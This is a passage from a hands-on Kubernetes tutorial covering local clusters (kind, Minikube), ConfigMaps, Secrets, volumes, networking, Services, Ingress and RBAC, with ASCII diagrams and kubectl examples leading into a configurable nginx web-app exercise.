| +-----------------+ +-----------------------+ |
| | Dashboard | | Cluster-level Logging | |
| | (Web UI) | | (Centralized | |
| +-----------------+ | Log Storage) | |
| +-----------------------+ |
| |
| +-----------------------+ +-----------------+ |
| | Monitoring | | Network Plugins | |
| | (Resource Monitoring) | | (Implement CNI) | |
| +-----------------------+ +-----------------+ |
+--------------------------------------------------+
Local Kubernetes Development Options
kind (Kubernetes in Docker)
kind is a tool for running local Kubernetes clusters using Docker container "nodes". It's designed for testing Kubernetes itself, but can be used for local development or CI.
Installation
`go install sigs.k8s.io/kind@v0.24.0`
# Or, for macOS users:
brew install kind
Creating a cluster
`kind create cluster`
Advantages of kind:
- Lightweight and fast to start up, making it ideal for rapid development cycles.
- Supports multi-node clusters, allowing you to simulate more complex environments.
- Runs Kubernetes inside Docker containers, which is efficient and consistent across different host systems.
- Ideal for testing and CI/CD pipelines due to its speed and reproducibility
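To exercise the multi-node support mentioned above, kind accepts a cluster config file. A minimal sketch, where the file and cluster names are arbitrary and the `kind.x-k8s.io/v1alpha4` API version matches the kind v0.24.0 pinned earlier:

```shell
# Write a three-node cluster config: one control-plane, two workers.
cat > kind-multinode.yaml <<'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
- role: worker
- role: worker
EOF
# Then create the cluster from it (requires Docker running):
#   kind create cluster --name dev --config kind-multinode.yaml
grep -c 'role: worker' kind-multinode.yaml   # → 2
```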
Minikube
Minikube is a tool that makes it easy to run Kubernetes locally. It runs a single-node Kubernetes cluster inside a VM on your laptop.
Installation
# For macOS
brew install minikube
For other systems, refer to the official documentation.
Starting a cluster
minikube start
Advantages of Minikube:
- More established and feature-rich, with a large community and extensive documentation.
- Supports multiple hypervisors (VirtualBox, HyperKit, etc.), allowing flexibility in your local setup.
- Provides built-in addons for common services, making it easy to enable additional functionality.
- Offers a dashboard for visual management of your cluster.
Practice with Basic Kubernetes Resources
To solidify your understanding, practice creating and managing these basic Kubernetes resources in both kind and Minikube environments:
- Pods: The smallest deployable units in Kubernetes.
- Deployments: Manage the deployment and scaling of a set of Pods.
- Services: Expose your application to network traffic.
Example commands:
# Create a deployment
kubectl create deployment nginx --image=nginx
# Expose the deployment as a service
kubectl expose deployment nginx --port=80 --type=LoadBalancer
# List pods
kubectl get pods
# List services
kubectl get services
By thoroughly understanding these concepts and practicing with both kind and Minikube, you'll build a solid foundation for working with Kubernetes in various environments.
To view nginx on your localhost you will need to expose it outside the cluster; with Minikube, `minikube service nginx` opens a tunnel to the service (search for the equivalent on other local clusters). You should ultimately see the default nginx welcome banner.
Day 3-4: Advanced Kubernetes
ConfigMaps, Secrets, and Volumes
+----------------------------------------------------+
| Pod |
| |
| +---------------+ +--------------------------+ |
| | Container | | Volume Mounts | |
| | (Application) | | /etc/config -> ConfigMap | |
| | | | /etc/secrets -> Secret | |
| +---------------+ +--------------------------+ |
| |
| +---------------------+ +------------------+ |
| | Environment | | ConfigMap | |
| | Variables | | | |
| | (from ConfigMap | | key1: value1 | |
| | and Secret) | | key2: value2 | |
| +---------------------+ +------------------+ |
| |
| +----------------------------------+ |
| | Secret | |
| | username: base64(user) | |
| | password: base64(pass) | |
| +----------------------------------+ |
+----------------------------------------------------+
ConfigMaps https://kubernetes.io/docs/concepts/configuration/configmap/
- Used to store non-confidential data in key-value pairs.
- Can be consumed as environment variables, command-line arguments, or configuration files in a volume.
- Example creation:
kubectl create configmap name --from-literal=name='{"first":"John", "second": "Doe"}'
- Example extraction:
kubectl get configmap name -o jsonpath='{.data.name}'
# or
kubectl get configmap name -o json | jq -r '.data.name' | jq -r .first
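The double-jq trick works because the ConfigMap's value is itself a JSON string. You can rehearse the pipeline locally without a cluster; the JSON below is a stand-in for what `kubectl get configmap name -o json` would return, and it assumes `jq` is installed:

```shell
# Stand-in for the ConfigMap JSON that kubectl would return.
cm='{"data":{"name":"{\"first\":\"John\", \"second\": \"Doe\"}"}}'
# First jq pulls out the raw string value; second jq parses that string as JSON.
printf '%s' "$cm" | jq -r '.data.name' | jq -r .first   # → John
```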
Secrets https://kubernetes.io/docs/tasks/configmap-secret/managing-secret-using-kubectl/
- Similar to ConfigMaps but intended for confidential data.
- Base64 encoded by default (not encrypted).
- Can be mounted as files or exposed as environment variables.
- Example creation:
kubectl create secret generic user-pass --from-literal=username=john --from-literal=password=s3cr3t
- Example extract:
kubectl get secrets user-pass -o json | jq -r .data.password | base64 -d   # -D on older macOS
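Because Secrets are only base64-encoded, "extracting" one is trivial for anyone with read access. A local sketch of the round trip, to make the point that this is reversible encoding rather than encryption:

```shell
# Base64 is reversible encoding, not encryption.
encoded=$(printf 's3cr3t' | base64)
echo "$encoded"                              # → czNjcjN0
printf '%s' "$encoded" | base64 -d && echo   # → s3cr3t
```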
Volumes https://kubernetes.io/docs/concepts/storage/volumes/
- Provide persistent storage for pods.
- Types include emptyDir, hostPath, nfs, and cloud provider-specific options.
- PersistentVolumes (PV) and PersistentVolumeClaims (PVC) provide a way to use storage resources in a pod-independent manner.
- Example
Create a configmap to hold your var
kubectl create configmap config-vol --from-literal=log_level=debug
Now create a pod with a running container that mounts the configmap as a var
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: configmap-pod
spec:
  containers:
  - name: test
    image: busybox:1.28
    command: ['sh', '-c', 'echo "The app is running!" && tail -f /dev/null']
    volumeMounts:
    - name: config-vol
      mountPath: /etc/config
  volumes:
  - name: config-vol
    configMap:
      name: config-vol # matches the ConfigMap created above
      items:
      - key: log_level
        path: log_level
EOF
Run a command to extract the value directly:
kubectl exec -it configmap-pod -- cat /etc/config/log_level
Or exec into the container:
kubectl exec -it configmap-pod -- sh
From there, navigate to the mount location:
cd /etc/config
ls            # here you should see log_level
cat log_level # prints "debug" without a trailing newline, so the prompt runs on
For clean output:
cat log_level ; echo
This could just as easily be a static volume location as opposed to a ConfigMap.
+----------------------------------------------------+
| Node |
| |
| +-------------------+ +-----------------------+ |
| | Pod | | Persistent Volume | |
| | | | | |
| | +-------------+ | | (Network File System, | |
| | | Container | | | /Volume Mount, | |
| | +-------------+ | | Cloud Storage, etc.) | |
| +-------------------+ +-----------------------+ |
| |
| +---------------------+ +---------------------+ |
| | Empty Dir Volume | | Host Path Volume | |
| | (Temporary Storage) | | (Nodes file system) | |
| +---------------------+ +---------------------+ |
| |
+----------------------------------------------------+
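The PV/PVC bullet above is worth a concrete sketch. A minimal claim, assuming a cluster with a default StorageClass; the name `demo-claim` is invented for illustration:

```yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: demo-claim               # hypothetical name
spec:
  accessModes:
    - ReadWriteOnce              # mountable read-write by a single node
  resources:
    requests:
      storage: 1Gi
  # storageClassName: standard   # uncomment to pin a specific class
```

A pod then references it with `persistentVolumeClaim: { claimName: demo-claim }` in its `volumes` list, exactly where the ConfigMap volume sat in the example above.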
Kubernetes Networking and Ingress
Networking is one of the largest areas of Kubernetes, and arguably the hardest concept to learn.
+----------------------------------------------------+
| +------------------+ |
| | External Traffic | |
| +------------------+ |
| | |
| v |
| +-------------------------+ |
| | Load Balancer | |
| +-------------------------+ |
| | |
| v |
| +-----------------------------+ |
| | Ingress Controller | |
| | (e.g., NGINX, Traefik) | |
| +-----------------------------+ |
| | | |
| v v |
| +-------------------+ +-------------------+ |
| | Ingress Rule 1 | | Ingress Rule 2 | |
| | host: foo.com | | host: bar.com | |
| | path: /app1 | | path: /app2 | |
| +-------------------+ +-------------------+ |
| | | |
| v v |
| +---------------------+ +---------------------+ |
| | Service 1 | | Service 2 | |
| | (ClusterIP/NodePort)| | (ClusterIP/NodePort)| |
| +---------------------+ +---------------------+ |
| | | | | |
| v v v v |
| +-------+ +-------+ +-------+ +-------+ |
| | Pod 1A| | Pod 1B| | Pod 2A| | Pod 2B| |
| +-------+ +-------+ +-------+ +-------+ |
| | | | | |
| v v v v |
| +-----------------------------------------------+ |
| | Container Network | |
| | (e.g., Flannel, Calico, Weave, Cilium) | |
| +-----------------------------------------------+ |
| | |
| v |
| +-------------------+ |
| | Node Network | |
| +-------------------+ |
+----------------------------------------------------+
This diagram illustrates:
- External traffic enters through a Load Balancer.
- The Ingress Controller (e.g., NGINX or Traefik) receives the traffic and processes it based on Ingress Rules.
- Ingress Rules define how traffic should be routed based on hostnames and paths.
- Services (ClusterIP or NodePort) receive traffic from the Ingress Controller and distribute it to Pods.
- Pods contain the application containers and are distributed across nodes.
- The Container Network (implemented by CNI plugins like Flannel, Calico, Weave, or Cilium) enables communication between Pods across nodes.
- The Node Network connects all nodes in the cluster.
Networking Model
+-------------------------++-------------------------+
| Node 1 || Node 2 |
| +---------+ +---------+ || +---------+ +---------+ |
| | Pod1 | | Pod2 | || | Pod3 | | Pod4 | |
| |IP:10.1.1| |IP:10.1.2| || |IP:10.2.1| |IP:10.2.2| |
| +---------+ +---------+ || +---------+ +---------+ |
| | || | |
| Virtual Ethernet Bridge || Virtual Ethernet Bridge |
| | || | |
+----------- |------------++------------|------------+
| |
| Cluster Network Fabric |
+--------------------------+
- Pod IP Addressing: Each pod is assigned a unique IP address from the cluster-wide CIDR range. This ensures that every pod has a distinct identity within the cluster.
- Direct Communication: Pods can communicate directly with each other using their assigned IP addresses, without the need for Network Address Translation (NAT) or port mapping.
- Intra-Node Communication: For pods on the same node, communication occurs through a virtual ethernet bridge. This allows for efficient local traffic routing.
- Inter-Node Communication: When pods on different nodes need to communicate, the cluster-level network layer handles routing based on the pod IP ranges assigned to each node.
- CNI Plugins: Container Network Interface (CNI) plugins implement the actual networking, ensuring proper routing and connectivity across the cluster. Popular CNI plugins include Calico, Flannel, and Weave.
This architecture simplifies application design and deployment, as pods can be treated similarly to VMs or physical hosts from a networking perspective.
Services
+------------------------+
| Service |
| (ClusterIP/NodePort) |
| IP: 10.0.0.1 |
+------------------------+
|
Load Balancing
|
+-----------+-----------+
| | |
+---------------+ | +---------------+
| Pod 1 | | | Pod 2 |
| IP:10.1 | | | IP:10.2 |
+---------------+ | +---------------+
|
+--------------+
| Pod 3 |
| IP:10.3 |
+--------------+
Kubernetes Services provide a stable network endpoint for a set of Pods, enabling reliable communication within the cluster. Services abstract the underlying Pod network, offering a consistent way to access applications regardless of Pod lifecycle changes. Key aspects of Kubernetes Services include:
- Service Types:
- ClusterIP (default): Exposes the service on an internal IP in the cluster
- NodePort: Exposes the service on each node's IP at a static port
- LoadBalancer: Exposes the service externally using a cloud provider's load balancer
- ExternalName: Maps the service to the contents of the externalName field
- Headless: Allows direct access to individual pod IPs
- Service Discovery: Services can be discovered through DNS or environment variables, making it easy for applications to find and communicate with each other.
- Load Balancing: Services automatically distribute incoming traffic across all backend pods, ensuring even load distribution.
- Stable Endpoints: Services provide stable IP addresses and DNS names for groups of pods, abstracting away the dynamic nature of pod lifecycles.
- Cloud Integration: Services can integrate with cloud provider load balancers for external access, simplifying the process of exposing applications to the internet.
Services play a crucial role in microservices architectures, facilitating seamless communication between application components and enabling scalability and resilience in Kubernetes environments
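To make the type list above concrete, here is a minimal NodePort Service sketch; the name, selector, and port values are invented for illustration:

```yaml
apiVersion: v1
kind: Service
metadata:
  name: demo-nodeport          # hypothetical name
spec:
  type: NodePort
  selector:
    app: web-app               # matches pods labelled app=web-app
  ports:
    - port: 80                 # cluster-internal service port
      targetPort: 80           # container port
      nodePort: 30080          # exposed on every node; must be 30000-32767
```

Omit `nodePort` and Kubernetes picks a free port in the range for you.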
Ingress
External Traffic
|
+------v------+
| Ingress |
| Controller |
+------+------+
|
+------v------+
| Ingress |
| Rules |
+------+------+
|
+------v------+
| Services |
+------+------+
|
+------v------+
| Pods |
+-------------+
Kubernetes Ingress is an API object that manages external access to services within a cluster, providing HTTP and HTTPS routing rules. It acts as a single entry point for incoming traffic, simplifying the exposure of multiple services through a unified interface. Key features of Ingress include:
- Traffic Routing: Ingress can route traffic based on URL paths, hostnames, or other criteria, allowing for complex routing scenarios.
- SSL/TLS Termination: Ingress can handle SSL/TLS termination, offloading this responsibility from individual services.
- Load Balancing: Ingress can distribute traffic across multiple backend services, acting as a load balancer.
- Name-based Virtual Hosting: Ingress supports routing to different services based on the hostname, enabling multiple applications to share a single IP address.
- Ingress Controller: Ingress requires an Ingress Controller to function, which implements the actual routing and load balancing logic. Popular Ingress Controllers include NGINX, Traefik, and Istio.
By consolidating routing rules into a single resource, Ingress simplifies network management and reduces the need for multiple load balancers, making it an essential component for production-ready Kubernetes deployments.
Examples:
Create a simple web application
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web-app
spec:
  replicas: 2
  selector:
    matchLabels:
      app: web-app
  template:
    metadata:
      labels:
        app: web-app
    spec:
      containers:
      - name: web-app
        image: nginx:latest
        ports:
        - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  name: web-app-service
spec:
  selector:
    app: web-app
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
EOF
This creates a Deployment named web-app whose pods expose port 80. It also creates a Service that directs calls on port 80 to port 80 of one of the pods matching the `app: web-app` label.
kubectl get deployments
kubectl get pods
kubectl get services
giving something like
NAME      READY   UP-TO-DATE   AVAILABLE   AGE
web-app   2/2     2            2           46s

NAME                       READY   STATUS    RESTARTS   AGE
web-app-6fdf6bcdd6-cfkjk   1/1     Running   0          42s
web-app-6fdf6bcdd6-nxv7f   1/1     Running   0          42s

NAME              TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)   AGE
kubernetes        ClusterIP   10.96.0.1       <none>        443/TCP   57s
web-app-service   ClusterIP   10.110.70.144   <none>        80/TCP    46s
Now create an ingress to create access
cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: web-app-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /\$1
spec:
  rules:
  - host: web-app.info
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: web-app-service
            port:
              number: 80
EOF
This creates an Ingress that exposes the cluster under the hostname web-app.info, directing all requests to port 80 of the web-app-service Service, which forwards them to port 80 of one of the Deployment's replicas.
kubectl get ingress
NAME              CLASS    HOSTS          ADDRESS   PORTS   AGE
web-app-ingress   <none>   web-app.info             80      2m28s
Ensure that the Ingress addon is enabled in Minikube.
minikube addons enable ingress
This command enables the NGINX Ingress Controller in your Minikube cluster.
Obtain the IP address of your Minikube cluster.
minikube ip
This will return the IP address of your Minikube cluster.
Add an entry to your hosts file for web-app.info to the Minikube IP.
echo "$(minikube ip) web-app.info" | sudo tee -a /etc/hosts
This step is necessary because you’ve specified `web-app.info` as the host in your Ingress resource.
Now you should be able to access your application by opening a web browser and navigating to: http://web-app.info
If everything is set up correctly, you should see the NGINX welcome page.
If you’re unable to access the application, try the following:
- Check Ingress status with kubectl get ingress; ensure that the ADDRESS field is populated with an IP address.
- Verify the Ingress Controller with kubectl get pods -n ingress-nginx; make sure the controller pod is running.
- Check the controller logs for errors: kubectl logs -n ingress-nginx $(kubectl get pods -n ingress-nginx -o name) (or run it in two separate steps: kubectl get pods -n ingress-nginx -o name first, then pass the pod name to kubectl logs -n ingress-nginx).
- As a last resort, try port forwarding: kubectl port-forward svc/web-app-service 8080:80, then access the application at http://localhost:8080.
Remember that Minikube is running inside a VM, so network access can sometimes be tricky depending on your setup. The methods described above should work in most cases, but you might need to adjust them for your specific environment.
Kubernetes RBAC and Security Concepts
+----------------------------------------------------+
| Kubernetes Cluster |
| |
| +--------------------+ +------------------------+ |
| | RBAC Objects | | Security Contexts | |
| | +---------------+ | | +--------------------+ | |
| | | Roles | | | | Pod Security | | |
| | | (Namespaced) | | | | Context | | |
| | +---------------+ | | | - User/Group | | |
| | | | | | - SELinux | | |
| | v | | | - RunAsUser | | |
| | +---------------+ | | | - Capabilities | | |
| | | RoleBindings | | | +--------------------+ | |
| | | (Namespaced) | | | | | |
| | +----------------+ | | v | |
| | | | +--------------------+ | |
| | +----------------+ | | | Container Security | | |
| | | ClusterRoles | | | | Context | | |
| | | (Cluster- Wide)| | | | - RunAsNonRoot | | |
| | +----------------+ | | | - ReadOnlyRootFS | | |
| | | | | | - Privileged | | |
| | v | | +--------------------+ | |
| | +----------------+ | | | |
| | | ClusterRole- | | +------------------------+ |
| | | Bindings | | |
| | | (Cluster-wide) | | |
| | +----------------+ | |
| | | |
| +--------------------+ |
| |
| +------------------------------------------------+ |
| | Network Policies | |
| | +-------------------+ +----------------------+ | |
| | | Ingress Rules | | Egress Rules | | |
| | | | | | | |
| | | - From: (sources) | | - To: (destinations) | | |
| | | - Ports | | - Ports | | |
| | +-------------------+ +----------------------+ | |
| | | |
| +------------------------------------------------+ |
| |
+----------------------------------------------------+
- RBAC Objects:
- Roles and RoleBindings (namespaced)
- ClusterRoles and ClusterRoleBindings (cluster-wide)
These objects define who can access what resources and perform what actions.
- Security Contexts:
- Pod Security Context: Applies to all containers in a pod
- Container Security Context: Specific to individual containers
These define privilege and access control settings for pods and containers.
- Network Policies:
- Ingress Rules: Control incoming traffic to pods
- Egress Rules: Control outgoing traffic from pods
These act as a virtual firewall for your Kubernetes cluster.
The diagram shows how these components interact within the Kubernetes cluster to provide a comprehensive security model. RBAC controls access to Kubernetes API resources, Security Contexts manage the runtime security settings for pods and containers, and Network Policies control the network traffic between pods and external sources
Role-Based Access Control (RBAC)
- Regulates access to resources based on the roles of individual users.
- Key objects: Role, ClusterRole, RoleBinding, ClusterRoleBinding. Example: creating a role that allows reading pods:
```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "watch", "list"]
```
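A Role grants nothing on its own; it has to be bound to a subject. A matching RoleBinding sketch, where the user name `jane` is invented for illustration:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
- kind: User
  name: jane                       # hypothetical user
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader                 # the Role defined above
  apiGroup: rbac.authorization.k8s.io
```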
Security Contexts
- Define privilege and access control settings for Pods or Containers.
- Can set UID, GID, capabilities, and other security parameters.
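A sketch showing both levels in one Pod manifest; the names are invented, and the settings shown are a common hardening baseline rather than a prescription:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: secure-demo                # hypothetical name
spec:
  securityContext:                 # pod-level: applies to all containers
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  containers:
  - name: app
    image: busybox:1.28
    command: ["sh", "-c", "sleep 3600"]
    securityContext:               # container-level: overrides/extends pod-level
      runAsNonRoot: true
      readOnlyRootFilesystem: true
      allowPrivilegeEscalation: false
```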
Network Policies
- Specify how groups of pods are allowed to communicate with each other and other network endpoints.
- Act as a virtual firewall for your Kubernetes cluster.
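A minimal NetworkPolicy sketch to make the "virtual firewall" concrete: only pods labelled `role: frontend` may reach `app: web-app` pods on port 80. The names and labels are invented, and enforcement requires a CNI that supports NetworkPolicy (e.g. Calico or Cilium):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-only        # hypothetical name
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: web-app                 # the pods this policy protects
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          role: frontend           # only these pods may connect
    ports:
    - protocol: TCP
      port: 80
```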
Exercise:
Deploying a Configurable Web Application
In this exercise, we'll create a simple web application that reads its configuration from a ConfigMap. We'll then deploy it to Kubernetes and expose it using a Service and Ingress.
This exercise demonstrates:
- Creating and using ConfigMaps
- Deploying a web application with Kubernetes
- Exposing the application using a Service and Ingress
- Injecting configuration into a container using environment variables
- Mounting ConfigMap data as a volume
- Updating configuration and seeing the changes reflected in the application
- Step 1: Create a ConfigMap
First, let's create a ConfigMap with some configuration data:

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: ConfigMap
metadata:
  name: webapp-config
data:
  BACKGROUND_COLOR: "#f0f0f0"
  MESSAGE: "Welcome to our configurable web app!"
EOF

+-------------------------------------------------+
|               Kubernetes Cluster                |
|                                                 |
| +-------------------------------------------+ |
| | ConfigMap                                 | |
| | Name: webapp-config                       | |
| | Data:                                     | |
| | +------------------+--------------------+ | |
| | | Key              | Value              | | |
| | +------------------+--------------------+ | |
| | | BACKGROUND_COLOR | "#f0f0f0"          | | |
| | +------------------+--------------------+ | |
| | | MESSAGE          | "Welcome to our    | | |
| | |                  | configurable web   | | |
| | |                  | app!"              | | |
| | +------------------+--------------------+ | |
| +-------------------------------------------+ |
+-------------------------------------------------+

This diagram shows:
- The overall Kubernetes cluster environment.
- Within the cluster, a ConfigMap named "webapp-config" is created.
- The ConfigMap contains two key-value pairs:
- BACKGROUND_COLOR: "#f0f0f0"
- MESSAGE: "Welcome to our configurable web app!"
The diagram illustrates how the ConfigMap stores configuration data as key-value pairs, which can be used by applications running in the cluster. This ConfigMap could be mounted as a volume or used as environment variables in a Pod, allowing the application to access these configuration values at runtime.
- Step 2: Create a Deployment
Now, let's create a Deployment for our web application. We'll use a simple Nginx image and inject our configuration as environment variables:
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp
spec:
  replicas: 2
  selector:
    matchLabels:
      app: webapp
  template:
    metadata:
      labels:
        app: webapp
    spec:
      containers:
      - name: webapp
        image: nginx:alpine
        ports:
        - containerPort: 80
        envFrom:
        - configMapRef:
            name: webapp-config
        volumeMounts:
        - name: config
          mountPath: /usr/share/nginx/html
      volumes:
      - name: config
        configMap:
          name: webapp-content
          items:
          - key: index.html
            path: index.html
EOF
+----------------------------------------------------+
| Kubernetes Cluster |
| |
| +------------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +--------------------------------------------+ | |
| | | ReplicaSet (2 replicas) | | |
| | | | | |
| | | +----------------------------------------+ | | |
| | | | Pod 1 | | | |
| | | | | | | |
| | | | +------------------------------------+ | | | |
| | | | | Container: webapp | | | | |
| | | | | | | | | |
| | | | | Image: nginx:alpine | | | | |
| | | | | Port: 80 | | | | |
| | | | | | | | | |
| | | | | EnvFrom: | | | | |
| | | | | ConfigMap: webapp-config | | | | |
| | | | | | | | | |
| | | | | VolumeMount: | | | | |
| | | | | Name: config | | | | |
| | | | | MountPath: /usr/share/nginx/html | | | | |
| | | | +------------------------------------+ | | | |
| | | | | | | |
| | | | +------------------------------------+ | | | |
| | | | | Volume: config | | | | |
| | | | | ConfigMap: webapp-config | | | | |
| | | | | Key: index.html | | | | |
| | | | | Path: index.html | | | | |
| | | | +------------------------------------+ | | | |
| | | | | | | |
| | | +----------------------------------------+ | | |
| | | | | |
| | | +------------------------------------+ | | |
| | | | Pod 2 | | | |
| | | | (Same structure as Pod 1) | | | |
| | | +------------------------------------+ | | |
| | | | | |
| | +--------------------------------------------+ | |
| | | |
| +------------------------------------------------+ |
| |
+----------------------------------------------------+
This diagram illustrates:
- The overall Kubernetes Deployment named “webapp”.
- The ReplicaSet managing 2 replicas (Pods).
- The structure of each Pod, including:
- The container named “webapp” using the nginx:alpine image.
- The container port 80 exposed.
- Environment variables loaded from the ConfigMap “webapp-config”.
- A volume mount for the “/usr/share/nginx/html” path.
- The volume configuration, which mounts the “index.html” key from the “webapp-content” ConfigMap.
The diagram shows how the Deployment manages multiple identical Pods, each containing a container with the specified configuration. It also illustrates the use of ConfigMaps for both environment variables and file mounting, demonstrating how Kubernetes can inject configuration data into containers.
- Step 3: Create a ConfigMap for the HTML content
Let's create another ConfigMap to hold our HTML content:
# Quote the heredoc delimiter so the shell leaves the ${...} placeholders intact.
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: ConfigMap
metadata:
  name: webapp-content
data:
  index.html: |
    <!DOCTYPE html>
    <html>
    <head>
      <title>Configurable Web App</title>
      <style>
        body { background-color: ${BACKGROUND_COLOR}; font-family: Arial,sans-serif; }
      </style>
    </head>
    <body>
      <h1>${MESSAGE}</h1>
      <p>This page is served by Nginx and configured using Kubernetes ConfigMaps.</p>
    </body>
    </html>
EOF
+----------------------------------------------------+
| Kubernetes Cluster |
| |
| +----------------------------------------------+ |
| | ConfigMap: webapp-config | |
| | | |
| | Data: | |
| | BACKGROUND_COLOR: "#f0f0f0" | |
| | MESSAGE: "Welcome to our configurable..."  | |
| +----------------------------------------------+ |
| |
| +----------------------------------------------+ |
| | ConfigMap: webapp-content | |
| | | |
| | Data: | |
| | index.html: (HTML content) | |
| | - Uses ${BACKGROUND_COLOR} | |
| | - Uses ${MESSAGE} | |
| +----------------------------------------------+ |
| |
| +----------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +----------------------------------------+ | |
| | | Pod | | |
| | | +-------------------------------+ | | |
| | | | Container: webapp | | | |
| | | | | | | |
| | | | - Image: nginx:alpine | | | |
| | | | - Port: 80 | | | |
| | | | | | | |
| | | | EnvFrom: | | | |
| | | | ConfigMap: webapp-config | | | |
| | | | | | | |
| | | | VolumeMount: | | | |
| | | | Name: config | | | |
| | | | MountPath: /usr/share/...  | | | |
| | | +-------------------------------+ | | |
| | | | | |
| | | +-------------------------------+ | | |
| | | | Volume: config | | | |
| | | | ConfigMap: webapp-content | | | |
| | | | Key: index.html | | | |
| | | | Path: index.html | | | |
| | | +-------------------------------+ | | |
| | +----------------------------------------+ | |
| +----------------------------------------------+ |
+----------------------------------------------------+
This updated diagram now includes:
- The original webapp-config ConfigMap with BACKGROUND_COLOR and MESSAGE.
- The new webapp-content ConfigMap containing the index.html template.
- The Deployment and Pod structure, showing how these ConfigMaps are used:
  - webapp-config is used as environment variables (envFrom).
  - webapp-content is mounted as a volume, providing the index.html file.
The new webapp-content ConfigMap contains an HTML template that references the ${BACKGROUND_COLOR} and ${MESSAGE} variables. Note that stock Nginx serves static files verbatim and does not substitute environment variables into them, so in practice you would render the template first (for example with envsubst in an init container or entrypoint script) before Nginx serves it. The intended setup is a dynamic, configurable web application where:
- The content of the page (HTML structure) is defined in one ConfigMap (webapp-content).
- The configuration values (background colour and message) are defined in another ConfigMap (webapp-config).
- The Nginx container serves the rendered HTML content, with the variables replaced by the actual configuration values.
This separation of concerns makes it easy to update either the content template or the configuration values independently, providing flexibility in managing your web application's appearance and content.
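To make the substitution step concrete, here is a minimal Python sketch (standard library only) of how the template would be rendered with values like those in webapp-config. This is illustrative, not part of the deployment — in the cluster you would do the equivalent with envsubst; the hard-coded values mirror the ConfigMap keys above.

```python
from string import Template

# Values as they would arrive from the webapp-config ConfigMap
# (hard-coded here for illustration).
config = {"BACKGROUND_COLOR": "#f0f0f0", "MESSAGE": "Welcome to our configurable app"}

html_template = Template("""<!DOCTYPE html>
<html>
<head><style>body { background-color: ${BACKGROUND_COLOR}; }</style></head>
<body><h1>${MESSAGE}</h1></body>
</html>""")

# substitute() raises KeyError if a placeholder has no value,
# which catches missing configuration early.
rendered = html_template.substitute(config)
print(rendered)
```

Running this prints the HTML with both placeholders filled in, which is exactly what the browser should receive.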
- Step 4: Create a Service
Now, let's create a Service to expose our Deployment:
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Service
metadata:
  name: webapp-service
spec:
  selector:
    app: webapp
  ports:
    - protocol: TCP
      port: 80
      targetPort: 80
EOF
+---------------------------------------------------+
| Kubernetes Cluster |
| |
| +---------------------------------------------+ |
| | ConfigMap: webapp-config | |
| | | |
| | Data: | |
| | BACKGROUND_COLOR: "#f0f0f0" | |
| | MESSAGE: "Welcome to our configurable..." | |
| +---------------------------------------------+ |
| |
| +---------------------------------------------+ |
| | ConfigMap: webapp-content | |
| | | |
| | Data: | |
| | index.html: (HTML content) | |
| | - Uses ${BACKGROUND_COLOR} | |
| | - Uses ${MESSAGE} | |
| +---------------------------------------------+ |
| |
| +---------------------------------------------+ |
| | Deployment: webapp | |
| | | |
| | +---------------------------------------+ | |
| | | Pod | | |
| | | +-------------------------------+ | | |
| | | | Container: webapp | | | |
| | | | | | | |
| | | | - Image: nginx:alpine | | | |
| | | | - Port: 80 | | | |
| | | | | | | |
| | | | EnvFrom: | | | |
| | | | ConfigMap: webapp-config | | | |
| | | | | | | |
| | | | VolumeMount: | | | |
| | | | Name: config | | | |
| | | | MountPath: /usr/share/... | | | |
| | | +-------------------------------+ | | |
| | | | | |
| | | +-------------------------------+ | | |
| | | | Volume: config | | | |
| | | | ConfigMap: webapp-content | | | |
| | | | Key: index.html | | | |
| | | | Path: index.html | | | |
| | | +-------------------------------+ | | |
| | +---------------------------------------+ | |
| +---------------------------------------------+ |
| |
| +---------------------------------------------+ |
| | Service: webapp-service | |
| | | |
| | Selector: app: webapp | |
| | Port: 80 -> targetPort: 80 | |
| +---------------------------------------------+ |
+---------------------------------------------------+
This updated diagram now includes:
- The original webapp-config ConfigMap with BACKGROUND_COLOR and MESSAGE.
- The webapp-content ConfigMap containing the index.html template.
- The Deployment and Pod structure, showing how these ConfigMaps are used.
- The new webapp-service Service, which:
  - Selects Pods with the label app: webapp
  - Exposes port 80 and forwards traffic to the Pods' port 80
The Service acts as a stable network endpoint for the Pods created by the Deployment. It provides:
- Load balancing: Distributes incoming traffic across all Pods matching the selector.
- Service discovery: Provides a stable IP address and DNS name for the set of Pods.
- Port mapping: Maps the Service port (80) to the target port on the Pods (also 80 in this case).
This Service allows other components within the cluster (or external to the cluster, depending on the Service type) to access the webapp Pods without needing to know the individual Pod IP addresses. It adds a layer of abstraction that enhances the scalability and flexibility of your application.

The flow of traffic would typically be:

External Request -> Service (webapp-service) -> Pod (webapp) -> Container (nginx:alpine)

This setup allows you to scale your Deployment (adding or removing Pods) without changing how other components interact with your webapp, as they will always communicate through the Service.
- Step 5: Create an Ingress
If your cluster has an Ingress controller, you can create an Ingress resource:
cat <<EOF | kubectl apply -f -
apiVersion: networking.k8s.io/v1
